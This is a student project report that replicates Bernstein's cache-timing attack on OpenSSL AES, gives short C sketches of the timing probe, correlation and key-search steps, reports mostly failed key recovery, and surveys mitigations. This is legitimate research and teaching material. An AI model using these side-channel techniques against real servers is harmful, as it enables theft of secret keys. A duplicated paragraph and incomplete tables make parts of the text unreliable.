ECE 746 Project Report


CACHE ATTACKS AGAINST SECRET KEY CRYPTOSYSTEMS
Rajesh Ravi, Lawrence Awuah.

Abstract— Side channel cryptanalysis is a growing area of research in cryptography. Attacks on secret key cryptosystems based on side channel cryptanalysis have had much success in recent times, forcing the designers of such algorithms to be mindful of these attacks while designing them. This paper analyzes cache attacks, a class of side channel attacks. A cache timing attack on the OpenSSL implementation of AES was verified. This paper extends earlier work on replicating this attack, using different scenarios. Real-world situations and the relevance of this attack are discussed, along with the methods currently in place to reduce its impact.

Index Terms— Side-channel attacks, AES, cache timing attacks, OpenSSL

I. INTRODUCTION

Traditional attacks on cryptographic systems were conducted on the mathematics of the system, for example differential and linear cryptanalysis. These methods rely on the ciphertext, or on ciphertext and plaintext together. It has since been shown that encryption devices reveal more information than the ciphertext itself. This information, which is neither ciphertext nor plaintext, is called side channel information. With the ability to obtain it, new attacks called side channel attacks were developed, based on power consumption analysis, timing information, fault analysis and acoustic measurements. Paul Kocher, one of the pioneers of this field, and his colleagues have carried out most of these attacks in real-world situations, and some of them have not been mitigated yet. Information typically leaked during a cryptographic transformation includes timing data, power consumption, electromagnetic radiation, sound and faults. NIST has taken note of this type of attack and has stated that AES itself is not vulnerable to them.
Manuscript received December 18, 2006. This work was done as part of the ECE 746 course at George Mason University. Rajesh Ravi is a graduate student at George Mason University (e-mail: rravi@gmu.edu). Lawrence Awuah is a graduate student at George Mason University (e-mail: lawuah@gmu.edu).

However, a specific timing attack developed by Bernstein, which relies on cache hits and misses, was able to recover the key in use. The method learns the cache access patterns of various operations and how they leak timing information, allowing an attacker to obtain a secret key set up at a server. Initial work on verifying this attack on different platforms confirmed that it works. However, that analysis also showed that the attack takes a very long time and carries a high probability of detection. To speed up the attack process and avoid detection, certain changes had to be made: the profiling process was done with a non-zero key, and the attack was run using three machines in parallel. The second section of this paper gives the background behind the attack, discussing AES, cache memory and the details of Bernstein's attack. The third section covers the investigation of the attack carried out for this paper, the results, and the reasons behind them. The fourth section considers real-world scenarios and how this attack fares in such situations. The fifth section discusses the mitigation methodologies currently in place, or that could be adopted, to prevent or reduce the effect of this attack. Finally, we present future work that can be done to improve this attack and describe further scenarios in which the results could prove useful.

II. BACKGROUND

A. AES
AES stands for Advanced Encryption Standard. It is part of the Federal Information Processing Standards (FIPS) specified by the National Institute of Standards and Technology (NIST). AES, documented in FIPS Publication 197, specifies a symmetric encryption algorithm for use by organizations to protect sensitive information; a detailed specification can be found in [9]. Here we discuss the specific points used in Bernstein's paper, which deals with keys of size 16 bytes (denoted n); the results obtained by him can be extended to longer or shorter key sizes. Any plaintext pi is represented as pi = (p0,i, . . . , p15,i), where pj,i is the j-th byte of pi.

A 16-byte key k = (k0, . . . , k15) is expanded by the key expansion into round keys K(r) = (K(r)0, . . . , K(r)15) for r = 0, . . . , 10, with K(0) = k. After an initial AddRoundKey operation, AES performs successive rounds in which SubBytes, ShiftRows, MixColumns and AddRoundKey are applied to the state. The state x(r) = (x(r)0, . . . , x(r)15) is the result of the r-th AddRoundKey; the initial state is obtained by the first AddRoundKey, i.e. x(0)j,i = pj,i ⊕ kj. We write p(r)i = (p(r)0,i, . . . , p(r)15,i) for the input of the r-th AddRoundKey, so that x(r)j,i = p(r)j,i ⊕ K(r)j. An encryption of plaintext p by AES with key k produces a ciphertext c, denoted c = EAES(p, k) [2]. Each round-r state is generated by applying these four transformations to the previous state, and this happens for a total of ten rounds. The S-box based table lookups make AES vulnerable according to Bernstein, who argues against using S-boxes at all. He also points out that key expansion is not always a good idea, because when many keys are handled simultaneously the time required to load precomputed values from memory may exceed the time needed to recompute them.
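To make the role of these table lookups concrete, the sketch below shows how the first round of a table-driven AES implementation indexes its tables. It is our own illustration of the general OpenSSL-style structure, not the library's actual code; T0-T3 are placeholder names for the usual 1 KB tables that combine SubBytes and MixColumns (ShiftRows is realized by which state byte indexes which table), and the round-key addition is omitted.

    #include <stdint.h>

    /* Illustrative sketch only: T0..T3 stand for the usual 1 KB lookup tables. */
    extern const uint32_t T0[256], T1[256], T2[256], T3[256];

    /* First output column of round 1.  The table indices have the form
     * p[j] ^ k[j], so which cache lines of T0..T3 are touched -- and hence
     * whether each lookup hits or misses -- depends on the secret key.
     * This key-dependent timing variation is what the attack measures. */
    uint32_t first_round_column0(const uint8_t p[16], const uint8_t k[16])
    {
        return T0[p[0]  ^ k[0]]
             ^ T1[p[5]  ^ k[5]]
             ^ T2[p[10] ^ k[10]]
             ^ T3[p[15] ^ k[15]];
    }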


B. Cache
Cache is a special type of computer memory that operates at very high speed. It is similar to RAM but much faster, and it is used by the CPU to store frequently accessed data. When data is accessed, a copy of it and its address in memory are stored in the cache. The next time the CPU looks for that information, it looks in the cache first. If the data is in the cache, this is called a hit, and the CPU can retrieve it much faster than from RAM or a hard disk. If the data is not found in the cache, this is called a miss; the CPU then puts a copy of the new data in the cache and processes the information. There are three types of cache misses: an instruction miss, a data read miss and a data write miss. An instruction miss causes the most delay, because the processor has to wait until the instruction is fetched from main memory; in the case of AES this is one way timing information can be leaked. Data read misses and data write misses come next in decreasing order of delay.

Modern processors have two levels of cache, Level 1 (L1) and Level 2 (L2). L1 cache is a very small amount of memory installed directly on the CPU, facilitating very fast access to frequently used data; L2 cache is external to the microprocessor. A diagram of a cache is given in Fig. 1.
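The hit/miss gap described above is easy to observe directly on x86 hardware. The following small program is our own illustration (it is not part of Bernstein's tool set): it times a load of the same variable with the rdtsc cycle counter, once while the variable is cached and once right after evicting it with clflush.

    #include <stdio.h>
    #include <stdint.h>
    #include <x86intrin.h>   /* __rdtsc, _mm_clflush, _mm_mfence (GCC/Clang on x86) */

    static volatile int probe;              /* the memory location we time */

    static uint64_t time_access(void)
    {
        _mm_mfence();                       /* fence so earlier work is not timed */
        uint64_t start = __rdtsc();
        int v = probe;                      /* the load being measured */
        (void)v;
        _mm_mfence();
        return __rdtsc() - start;
    }

    int main(void)
    {
        probe = 1;                          /* touch it once so it is cached   */
        uint64_t hit = time_access();       /* fast: served from L1            */

        _mm_clflush((const void *)&probe);  /* evict it from every cache level */
        _mm_mfence();
        uint64_t miss = time_access();      /* slow: fetched from main memory  */

        printf("hit: %llu cycles, miss: %llu cycles\n",
               (unsigned long long)hit, (unsigned long long)miss);
        return 0;
    }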

C. Bernstein's Attack
Bernstein's attack is based on the fact that AES leaks timing information through cache hits and misses. In his attack, a client computer that is remotely connected to a server sends random plaintexts to the server. The server encrypts the data and, instead of replying with the ciphertext, replies with the time needed for the encryption. The attack consists of four stages, usually referred to as profiling, attacking, correlation and brute-force key search.

Profiling phase: In this phase the attacker is required to know the value of the key set up at the server. In Bernstein's attack a zero key was used to simplify things, but any known key can be used. Let P = {p0, p1, . . . , pl} be a set of l + 1 random plaintexts. The client sends each of these plaintexts and records the time taken for encryption, together with the value of each byte, in a matrix t[16][256]; the number of measurements per value of a byte is stored in a second matrix tnum[16][256]. After the l + 1 encryptions, this yields the average computation time for each individual value that each byte of the plaintext can take. This is done with plaintexts of different packet sizes, mainly 400-byte, 600-byte and 800-byte packets, and the results are written into files called study.400, study.600 and study.800. Bernstein states that approximately 2^22 packets are required for the process. The result is a profile of the server system.

Attacking phase: In this phase the attacker does not know the key set up on the server; the purpose is to obtain it. The attacker sends another set of random plaintexts to the server and records the same information (encryption times and byte values) into matrices, as before. The same packet sizes are used as in the profiling phase, and the files are stored as attack.400, attack.600 and attack.800. A packet of all zeros is also sent to the server, and the resulting ciphertext is stored in a file called attack.

Correlation phase: In this phase the results of the profiling and attacking phases are combined using a simple correlation and saved into another matrix c[16][256]. The elements of c are sorted in decreasing order, and the highest correlation results are kept according to a deviation threshold, so that the most highly correlated values are stored as the potential key candidates.
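A minimal sketch of the profiling bookkeeping described above (our own paraphrase of the idea, not Bernstein's actual study program): every timed packet updates the t and tnum matrices, and the per-value averages derived from them form the server's timing profile.

    #include <stdint.h>

    /* t[j][b] accumulates the encryption times observed when plaintext byte j
     * had value b; tnum[j][b] counts how many samples went into that cell. */
    static double    t[16][256];
    static long long tnum[16][256];

    /* Called once per timed packet, with the 16 plaintext bytes that were sent
     * and the encryption time reported back by the server. */
    void record_sample(const uint8_t plaintext[16], double cycles)
    {
        for (int j = 0; j < 16; j++) {
            t[j][plaintext[j]]    += cycles;
            tnum[j][plaintext[j]] += 1;
        }
    }

    /* After enough packets, the average time for "byte j had value b" is the
     * timing signature used later in the correlation phase. */
    double average(int j, int b)
    {
        return tnum[j][b] ? t[j][b] / (double)tnum[j][b] : 0.0;
    }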


Fig. 1. Representation of a cache: cache entries hold an index, a tag and a copy of the data for recently accessed main-memory locations (which themselves hold an index and data).

Brute-force key search phase: Finally, a brute-force key search is applied, in which the possible key combinations are used to encrypt a packet containing all zeros, and the result is compared with the ciphertext saved in the attack file during the attacking phase. As the number of correlations increases, the number of potential keys decreases, giving quicker results and finally the recovered AES key.
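The search can be pictured as a depth-first walk over the per-byte candidate lists left by the correlation phase. The sketch below is our own illustration using OpenSSL's AES_encrypt, not the original search tool; its cost grows with the product of the candidate-list sizes, which is why strong correlations (short lists) are essential.

    #include <string.h>
    #include <openssl/aes.h>

    /* cand[j] holds the ncand[j] candidate values for key byte j, as produced by
     * the correlation phase; target is the ciphertext of the all-zero block that
     * was recorded in the attacking phase.  Illustration only. */
    extern unsigned char cand[16][256];
    extern int ncand[16];
    extern unsigned char target[16];

    static unsigned char key[16];

    /* Depth-first search; returns 1 and leaves the recovered key in key[] when a
     * trial encryption of the all-zero block matches the recorded ciphertext. */
    int search(int pos)
    {
        if (pos == 16) {
            AES_KEY ek;
            unsigned char zero[16] = {0}, out[16];
            AES_set_encrypt_key(key, 128, &ek);
            AES_encrypt(zero, out, &ek);
            return memcmp(out, target, 16) == 0;
        }
        for (int i = 0; i < ncand[pos]; i++) {
            key[pos] = cand[pos][i];
            if (search(pos + 1))
                return 1;
        }
        return 0;
    }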

The math behind the attack can be stated simply. The input to the encryption is either pj,i ⊕ kj (known key) or p′j,f ⊕ k′j (secret key), where p denotes a plaintext byte and k a key byte. Bernstein's method computes the matrices mentioned above, which hold the encryption times and byte values, averaging the individual times for each possible value a single byte can take, independently of the other 15 input bytes. So individual time profiles arise, from random plaintext encryptions, for every byte separately, depending on the key. Applying the simple heuristic that pairs satisfying pj,i ⊕ kj = p′j,f ⊕ k′j will also have a matching time profile [9] naturally leads to a correlation between the two matrices. The secret key can then be derived as k′j = pj,i ⊕ kj ⊕ p′j,f.
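This heuristic translates into code directly. In the sketch below (our own restatement, not the actual correlate program) sig_study and sig_attack are assumed to hold the per-byte timing signatures, i.e. average time minus overall average, from the profiling and attacking phases. For each guess g of kj ⊕ k′j the profile signature is compared with the attack signature shifted by g; the best guess yields the candidate key byte k′j = kj ⊕ g.

    #include <stdint.h>

    /* sig_study[j][v]: timing signature when plaintext byte j had value v during
     * profiling (key k known).  sig_attack[j][v]: the same, against the unknown
     * key k'.  Both are assumed to be filled in already. */
    extern double sig_study[16][256];
    extern double sig_attack[16][256];

    /* Score for the hypothesis k'_j = k_j ^ g.  If the hypothesis is right,
     * plaintext value v in the profile and v ^ g in the attack data index the
     * same table entries, so the two signatures line up and the sum is large. */
    double score(int j, uint8_t g)
    {
        double s = 0.0;
        for (int v = 0; v < 256; v++)
            s += sig_study[j][v] * sig_attack[j][v ^ g];
        return s;
    }

    /* Best candidate for key byte j, given the known profiling key byte. */
    uint8_t best_candidate(int j, uint8_t known_kj)
    {
        uint8_t best_g = 0;
        double best = score(j, 0);
        for (int g = 1; g < 256; g++) {
            double s = score(j, (uint8_t)g);
            if (s > best) { best = s; best_g = (uint8_t)g; }
        }
        return (uint8_t)(known_kj ^ best_g);   /* k'_j = k_j ^ g */
    }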

III. INVESTIGATION OF THE ATTACK

The purpose of this work was to extend the work done by Robert Salembier [1] in verifying the attack proposed by Bernstein. In [1], the attack was verified on an AMD Athlon XP processor using OpenSSL version 0.9.7e. He speculated that the attack would take less time if done using three computers in parallel, and he also proposed that the attack be verified on other processors and that the profiling phase be done with a non-zero key. We did a total of four tests: three of the complete attack and one of the profiling phase using a non-zero key.

A. Testing Environment
A total of seven computers were used. The specifications and the environment under which they were set up are shown in Table 1.



TABLE 1: TEST ENVIRONMENT

Test 1
Server: CentOS 4.4, x86_64 edition; AMD Athlon 3200+ (Venice core), 2.0 GHz; 2 GB RAM; L1 cache: 128 KB; L2 cache: 512 KB; GCC and OpenSSL versions: not recorded.
Attacker 1: Fedora Core 5, 32-bit; Pentium 4 Mobile, 3.06 GHz; 512 MB RAM; L1 cache: 8 KB data; L2 cache: 512 KB; GCC 4.1; OpenSSL 0.9.8b.
Attacker 2: Fedora Core 5, 32-bit; Pentium M, 1.8 GHz; 512 MB RAM; L1 cache: 64 KB; L2 cache: 2 MB; GCC 4.1.1; OpenSSL 0.9.8b.
Attacker 3: Fedora Core 5, 32-bit; Pentium M, 1.7 GHz; 512 MB RAM; L1 cache: 64 KB; L2 cache: 2 MB; GCC 4.1.1; OpenSSL 0.9.8b.
Network connection: all computers connected through a D-Link DI-624 router on a 100 Mbps LAN.

Tests 2 and 4 were done with the same setup as Test 1.

Test 3
Server: Fedora Core 6, 32-bit; Pentium M, 1.8 GHz; 512 MB RAM; L1 cache: 64 KB; L2 cache: 2 MB; GCC 4.1; OpenSSL 0.9.7a.
Attacker 1: Fedora Core 6, 32-bit; Intel Xeon processor; 512 MB RAM; L1 cache: 64 KB; L2 cache: 512 KB; GCC 4.1; OpenSSL 0.9.8b.
Attackers 2 and 3 have the same configuration as Attacker 1.
Network connection: all computers connected through a Linksys switch on a 100 Mbps LAN.

B. Overview of the tests
Test 1: The first test was simply to familiarize ourselves with the various parts of the source code and to set up all the computers; no information was documented. Profiling and attacking phases with the different packet sizes of 400, 600 and 800 bytes went smoothly, and information was collected for less time than specified in Bernstein's paper. The correlate program was run and, as expected, it found a very low number of correlations, so a brute-force search would have been meaningless as it would never finish. The attack was then carried on for the same amount of time as specified in [1], and the number of correlations was still very small. The number of packets sent can be determined by checking the file sizes, as explained in [1].

Test 2: This was the actual full-scale test, using three computers for profiling and attacking one server. As suggested in [1], it was known when to end the profiling and attacking phases. For the study.400, study.600 and study.800 files, about 2^22 packets were sent for each packet size; for the attacking phase, about 2^23 packets were sent. All the information was saved into the attack.xxx and study.xxx files. The profiling phase took about 6 days and the attacking phase about 10 days. This is quite different from [1], where individual profiling took 11 days. We had expected the profiling phase to take 4 days, since the longest profiling time in [1], 4 days for the 800-byte packets, should have been the limiting factor when all three packet sizes were profiled in parallel; however, the time required was at least 2 days more than expected, and the attacking phase took about 3 days more than predicted in [1]. The result had a lot of correlations, but the candidate lists were huge, with each key location having about 256 candidates, so a brute-force key search on them would be useless as it would never finish. Possible reasons were investigated, and it was found that OpenSSL had recently adopted a mitigation technique for the cache timing hazard; more details about this technique are given in the results section. The correlations for this test are shown in Figure 2.

Test 3: Learning from Test 2, we chose the same version of OpenSSL that Bernstein used (setting it up took 3 days, since prior knowledge of compiling and installing an older version on Linux was needed) and ran the attack again, this time on a different processor, a Pentium M. The test took the same times for profiling and attacking as Test 2. The correlations improved considerably, the smallest candidate list having 16 values; however, they were still not enough for the brute-force attack to give a quick result, and the brute-force search might take multiple days to recover the key. One important observation was that the version change did affect the number of correlations, which led us to conclude that timing information was being leaked when the older version was used. The reasons were investigated by examining the OpenSSL code and tracking the changes made across versions; the details are presented in a later section. Another key factor was that the attacks in [1] and in Bernstein's original paper were done on a processor with a much smaller L1 cache than the processor we used, so many more packets have to be sent to the server to gather the timing information needed to establish proper correlations.

The first column in Figures 2 and 3 gives the number of remaining candidate values for a particular key byte, whose position is given by column 2; column 3 lists all the candidate values for that key byte.

Test 4: This test was done to check whether profiling based on a non-zero key works in producing correlations. For this purpose we had to understand how the code written by Bernstein actually finds the secret key using the math explained in Section II; this was accomplished with the help of the analysis given in [2], summarized in the background section. The key at the server was set to a known value by reading bytes from the Linux random number generator and using them to set up the key. The study program was then used to collect the timing information, exactly as in the zero-key case; it printed output as shown in Figure 4. The meaning of the columns is explained in Bernstein's paper.
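As an illustration of this setup step (a sketch under our assumptions, not the project's actual server code), the known profiling key can be drawn from the Linux random number generator and expanded with OpenSSL's AES_set_encrypt_key(), with the key bytes printed so that the profiling data can later be interpreted against the known key.

    #include <stdio.h>
    #include <openssl/aes.h>     /* AES_set_encrypt_key, AES_KEY */

    int main(void)
    {
        unsigned char key[16];
        AES_KEY expanded;

        /* Read 16 key bytes from the Linux random number generator. */
        FILE *f = fopen("/dev/urandom", "rb");
        if (!f || fread(key, 1, sizeof key, f) != sizeof key) {
            perror("reading /dev/urandom");
            return 1;
        }
        fclose(f);

        /* Expand the key the same way the timing server would before encrypting
         * the incoming packets. */
        if (AES_set_encrypt_key(key, 128, &expanded) != 0) {
            fprintf(stderr, "AES_set_encrypt_key failed\n");
            return 1;
        }

        /* Record the key so the profiling results can be interpreted later. */
        printf("profiling key: ");
        for (int i = 0; i < 16; i++)
            printf("%02x", key[i]);
        printf("\n");
        return 0;
    }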



5c 49 c6 bf d7 1d 4e 5b fa 6a 45 64 23 4a 63 0b – cipher text from all zero plain text 211 0 27 20 a6 25 22 26 21 a0 23 a2 8e a5 a4 43 a7 42 24 aa 47 a3 8b a1 b4 8d .... 248 1 6a 69 68 6b 6e 6c 6d 6f 0a 0f 09 0c 0e 0d 0b 08 4a... 232 2 f6 f0 f3 04 f1 f2 02 01 00 f4 f7 f5 03 05 30 06 07…. 16 3 05 02 06 00 01 04 07 03 94 91 95 90 97 96 93 92….. 181 4 3d 3f 38 39 3a 3c 3b 3e 32 36 31 35 37 30 33 .... 248 5 9d 9b 9f 9e 98 99 7e 9c ea 9a ee 78 7f 79 f4 7a ec 7c e8... 256 6 21 25 23 22 9b 9a 12 87 27 26 9f 99 80 20 24 ae 86….. 248 7 83 81 82 86 87 80 84 85 94 17 92 13 12 93 14 90 16 91.. 246 8 ff fa fc fb 42 f9 fe 46 f8 44 fd 41 6d 47 40 43 68 69 45 6f……. 16 9 c4 c0 c7 c6 c2 c5 c3 c1 e6 e2 e4 e3 e5 e1 e7 e0 ...... 56 10 92 97 93 91 96 94 90 95 18 1d 1c 1f 1e 19 1b 1a bf……… 180 11 42 47 46 40 44 45 43 d7 d1 d6 d5 d3 41 d0 d2 d4 5c... 256 12 1c e7 36 06 e0 41 34 12 e6 ea 09 21 1e e2 ed 13 32... 98 13 e9 ea ec ed e8 ee ef eb cc c8 cd cb c9 ca ce cf d5 ... 256 14 89 8c 8b 8a 8d 8e 8f 75 18 76 2d 73 88 70 19 77 74 ... 152 15 56 50 54 57 55 53 52 51 f0 f1 f7 f4 f6 f3 43 f2 f5 …..

Fig. 2. Correlations for Test 2.

(count, key byte): (16, 0) (70, 1) (32, 2) (240, 3) (134, 4) (32, 5) (16, 6) (16, 7) (16, 8) (48, 9) (16, 10) (16, 11) (16, 12) (16, 13) (16, 14) (16, 15)

d9 db d8 d0 d4 d1 df d3 de d5 d2 da d7 dc d6 dd 86 8d 85 82 81 8b 8e 88 89 8f 8a 87 83 8c 84 80 44 40 .... 5f 5b 55 50 51 54 5e 57 5a 59 53 5d 5c 58 56 52 63 66 .... 87 86 8b 89 84 85 81 8a 80 83 8f 82 8e 8d 88 8c fc fd f6............. 86 81 8b 8d 87 82 89 8c 83 85 8a 8f 88 80 8e 84 1a ........ 88 8b 86 82 8c 81 8e 80 83 8a 8f 85 8d 87 89 84 f1 f2 fb fd f4 f8 f9 ff f7 fa f0 f3 fe f5 f6 fc 37 3b 33 32 31 34 3e 38 30 36 3c 3f 3d 3a 39 35 b1 bd b2 b4 b3 b5 bc bf b7 b8 be ba b9 bb b0 b6 23 2d 2b 28 25 27 24 2c 20 26 2e 2f 22 2a 29 21 bd bf b5 bc b6 b0 b8 b1 ba be bb b7 b4 b2 b3 b9 4a 49 4b 40 42 48 47 4c 41 46 4d 43 45 4e …. 96 91 9f 90 92 93 97 9d 9b 98 9e 9a 9c 94 99 95 f1 f0 f3 fd fe f8 f2 fa f7 f4 ff fc f9 fb f6 f5 72 79 70 7a 7f 75 7d 77 73 7c 78 7b 7e 76 71 74 fc f0 ff f7 fe f9 f4 f2 fa f8 fd f3 f1 fb f6 f5 0a 0f 05 04 09 01 02 07 06 03 0b 0d 00 0c 0e 08 82 85 89 8a 87 8e 88 8b 83 84 80 86 8d 8c 81 8f

Fig. 3. Correlations for Test 3.



0 400  0 76 1574.763 15.534 -3.974 1.782
0 400  1 67 1574.761 18.666 -3.976 2.280
0 400  2 61 1575.279 14.458 -3.458 1.851
0 400  3 55 1578.182 28.621 -0.555 3.859
0 400  4 58 1577.362 17.599 -1.375 2.311
0 400  5 65 1580.369 35.131  1.632 4.357
0 400  6 77 1574.792 14.536 -3.945 1.656
0 400  7 79 1576.342 15.722 -2.395 1.769
0 400  8 73 1580.055 32.522  1.318 3.806
0 400  9 70 1583.300 52.195  4.563 6.239
0 400 10 59 1575.017 17.270 -3.720 2.248
0 400 11 56 1575.143 11.615 -3.594 1.552
0 400 12 60 1576.583 14.504 -2.154 1.873
0 400 13 51 1584.098 34.880  5.361 4.884
0 400 14 57 1573.298 12.582 -5.439 1.667
0 400 15 59 1578.051 22.422 -0.686 2.919
0 400 16 51 1580.686 30.320  1.949 4.246
0 400 17 58 1574.517 15.263 -4.220 2.004
0 400 18 58 1576.069 27.029 -2.668 3.549
0 400 19 66 1573.167 13.393 -5.570 1.649

Fig. 4. Profiling with a known non-zero key.

C. Time and Packets Required
All the times required for the attack, along with the approximate number of packets sent, were recorded for Tests 2 and 3. 2^22 packets were sent for each packet size. The times for profiling and attacking are given in Tables 2 and 3. As can be seen from the tables, the attacking phase was carried out for a maximum of 2^23 packets and the profiling phase for 2^22 packets. Bernstein, however, had specified that 2^27 packets were needed for the 800-byte packets; our results show that running the attack for that many packets would require at least two months. It can finally be concluded that the profiling phase took 5 days and the attacking phase 10 days. This is an improvement of 6 days over [1]; a real gain, though not close to what was predicted in [1]. This can be attributed to the fact that the server had much more work to do, and that the network was flooded with these packets, which required some scheduling by the router before they could be delivered to the server.

D. Test Results
Test 1 gave an idea of how to set up the test environment, how to read the timing information, and which precautions to take when stopping and starting the attack. Test 2 results were very discouraging: the attack was allowed to run for a sufficient amount of time and the correlations were still very weak. On searching the OpenSSL mailing lists, however, it was found that the cache timing problem had been partially mitigated using simple techniques. The first method was to compress the S-box tables from 5 KB to 2 KB + 256 bytes. The whole operation therefore requires much less space than Bernstein assumed, and less space means these tables are less likely to be thrown out of the cache as encryption runs continuously on the packets pouring in from the attackers. Even though performance was not the primary goal (on the contrary, the extra shifts induced by the compressed S-box and the longer loop epilogue induced by scheduling for L2 have a negative effect on performance), the code turned out to run in about 23 cycles per processed byte encrypted or decrypted with a 128-bit key. The second method was to schedule the S-box references for L2 cache latency, which means that the tables

do not have to reside in the L1 cache. The L2 cache is usually very large, on the order of 2 MB in a Pentium M for example, so the leakage of timing information would be minimal if this method were used.


TABLE 2: TIME REQUIRED FOR PROFILING.

Packets sent   2^16    2^19    2^22
study.400        70      80    4050
3.8 days         70     150    4200
study.600        90     100    6146
4.4 days         90     190    6336
study.800       120     140    6652
4.8 days        120     260    6912

TABLE 3: TIME REQUIRED FOR ATTACKING.

Packets sent   2^16    2^22    2^23
study.400        80    4050
4 days           70    4290
study.600        90    6000
4.3 days         90    6090
study.800       120     140   14140
10 days         120     260   14400

Similar results were obtained when students at another university performed the attack [8]; they concluded that the difference in cache sizes produced such a correlation profile. In [3], the authors ran experiments on various configurations and concluded that the results of the attack depend deeply on the type of hardware and software used. They found that key recovery is only effective in recovering a limited number of the higher bits of each byte. In some of their experiments, the byte signature, which shows the variation of the encryption time with respect to the average, presented a distinct single peak for certain architectures and chosen plaintexts. Test 3 gave much better correlations than Test 2, but they were still not enough to find the key: by inspection, at least two key bytes were missing from the candidate lists, so the attack could never succeed. It was therefore concluded that we would need to send more packets in order to obtain correlations strong enough to yield the key.

In [3], the authors also did additional experiments over a network, beyond the ones we did, and found a difference of two orders of magnitude between the encryption time and the network delays. They obtained a result similar to ours even after a huge number of measurements. They finally hypothesized that the variance of the network delays (and/or of the protocol stacks) is so much larger than the variance of the target signal that no practical number of measurements will expose the target signal; the bare method as it stands today is therefore not a real threat against remote servers, e.g. in timing attacks over the Internet, where the variance of network timing will be even larger.

Security is given a very high priority today, and operating system makers pay enough attention to it that one needs to look at what is being done with respect to side channel cryptanalysis. We observed that when the server was set up and the profiling phase started, packets sent by the attacker were being dropped. The server's firewall was disabled, yet the packets were still dropped. After examining all the settings, we found the cause to be SELinux (Security Enhanced Linux), which ships with all versions of Red Hat's operating systems and is mainly concerned with kernel-level security, such as system calls. This shows that this sort of attack may not be feasible against such systems: an attacker would have to get around this problem, which may introduce more noise that has to be averaged out by sending even larger numbers of packets. As per our results, one can infer that as the cache size increases, the difficulty of obtaining results through Bernstein's simple scheme increases manifold. So Bernstein's method has to be improved in order to get results; this was done by the authors of [3].

IV. FEASIBILITY OF THE ATTACK IN A REAL-WORLD SCENARIO

One of the important questions that needs to be answered is the relevance of this attack in a real-world scenario. For this attack to succeed in the real world, an attacker needs control over the actual server, at least to the extent of being able to set up a known key for the profiling phase. If he does not have control over the server, he should at least have access to a machine with a very similar configuration so that he can establish its characteristics with a known key (the profiling phase).

With three computers in parallel, the attack took a total of 15 days, counting the profiling and attacking phases. However, the secret key that the attacker intends to learn may not stay the same for such a long time: the policy of SSH, or of any other protocol using AES, would usually be to change the key at least every few hours. Since the attack takes days to complete, it is really difficult for such an attack to actually succeed. Intrusion detection systems have also become very sophisticated over the years; tools like Snort can alert the administrator to suspicious traffic flowing into the network, which can result in the traffic from the attacking system being blocked. The attacker would therefore have to modify this simple attack so that the traffic moves stealthily on a non-suspicious port. A total of about 2^27.5 packets was needed for the Bernstein attack to actually recover the key successfully. A new breed of attacks, called cache collision attacks, has been proposed which can recover the key with far fewer packets [2]; an expanded final-round attack needs only 2^13 packets, compared with the huge number of packets needed by Bernstein's attack.

V. MITIGATION METHODOLOGIES

Various methods have been proposed since the original attack. They improve upon the original paper and provide innovative ways to find the AES key using the same basic principle as Bernstein. Fortunately, all of these authors have also provided ways to mitigate the attacks they propose, so implementers do not have to search for countermeasures themselves. The mitigation methodologies can be divided into two broad categories: hardware-based and software-based mitigations.

Software mitigations: Bernstein's main suggestion for preventing his attack was to write constant-time AES software. This is not only extremely difficult but would also degrade performance. His other suggestions include making sure that the S-boxes remain in the cache almost all the time. This is difficult to achieve, because if the processor has a small L1 cache there is a high probability that the S-boxes will be thrown out of the cache by the AES computation itself. All in all, it depends on the architecture of the CPU.

In [7], Osvik, Shamir and Tromer thoroughly discuss various schemes to prevent these attacks. Some of these schemes are the following.

Avoiding memory accesses: The authors suggest that the table lookups done by AES can be replaced by an alternative description of the cipher which uses only logical operations. Another approach is to place the tables in registers instead of cache; some architectures (e.g. 64-bit platforms and PowerPC) have enough register space to accomplish this.

Alternative lookup tables: OpenSSL's implementation of AES uses lookup tables of 1024 bytes each. Several variants of these tables can be used which occupy much less cache space, including 256-byte tables, or loading only one table and obtaining the others by rotation.

Data-oblivious memory access pattern: This scheme does not avoid lookup tables, but instead ensures that the pattern of memory accesses is completely independent of the data passing through the algorithm. More details can be found in [7].

Cache state normalization and process blocking: Normalization of the cache can be used to prevent synchronous attacks. It can be achieved in several ways; one is to load all of the lookup tables into the cache before use. It must then be ensured that the table elements are not evicted by the encryption itself, or by accesses to the stack, inputs or outputs; ensuring this is a delicate, architecture-dependent affair. This method also fails to protect against asynchronous attacks.
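A minimal sketch of the normalization idea, assuming OpenSSL-style tables Te0-Te3 of 256 32-bit words each (the names here are placeholders): touch one word in every cache line of every table immediately before each encryption, so the tables are resident regardless of key and plaintext. A real countermeasure must additionally ensure that the entries are not evicted during the encryption itself, as noted above.

    #include <stdint.h>

    #define CACHE_LINE     64                          /* bytes per line (typical) */
    #define WORDS_PER_LINE (CACHE_LINE / sizeof(uint32_t))

    /* Placeholder declarations for the four 1 KB encryption tables. */
    extern const uint32_t Te0[256], Te1[256], Te2[256], Te3[256];

    static volatile uint32_t sink;   /* keeps the loads from being optimized away */

    /* Touch one word in every cache line of every table so that, by the time the
     * key-dependent lookups run, all table lines have just been (re)loaded. */
    void preload_tables(void)
    {
        const uint32_t *tables[4] = { Te0, Te1, Te2, Te3 };
        for (int t = 0; t < 4; t++)
            for (int i = 0; i < 256; i += (int)WORDS_PER_LINE)
                sink ^= tables[t][i];
    }

    /* Call preload_tables() immediately before each AES encryption. */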

ECE 746 Project Report This scheme tries to inject noise in to the timing measurements by adding random delay. So, the attacker has to send large amount of packets to average out the noise. This way, one can make the attack to be delayed and make the attacker give up on the attack. Operating System support : In this scheme, operating system kernel provides support for cryptographic primitives and operations. This way, the space meant for kernel will be allowed to be used by the cryptographic operations and there by become privileged operations revealing no information. However, this will result in lack of flexibility as the user will have to upgrade the kernel each time there is a patch issued for an algorithm. • • •

Operating system support: In this scheme the operating system kernel provides support for cryptographic primitives and operations. The kernel's protected space can then be used by the cryptographic operations, which thereby become privileged operations revealing no information. However, this reduces flexibility, as the user has to upgrade the kernel each time a patch is issued for an algorithm.

Brickell, Graunke, Neve and Seifert (BGNS) combined some of these identified mitigation methods into one process [1]. They proposed to use smaller tables while frequently randomizing them and preloading them into the relevant cache lines, and claimed that this was verified experimentally. Our results tend to agree with them: Test 2 produced very weak correlations because a newer version of OpenSSL, with some of these mitigation techniques implemented, was in use.

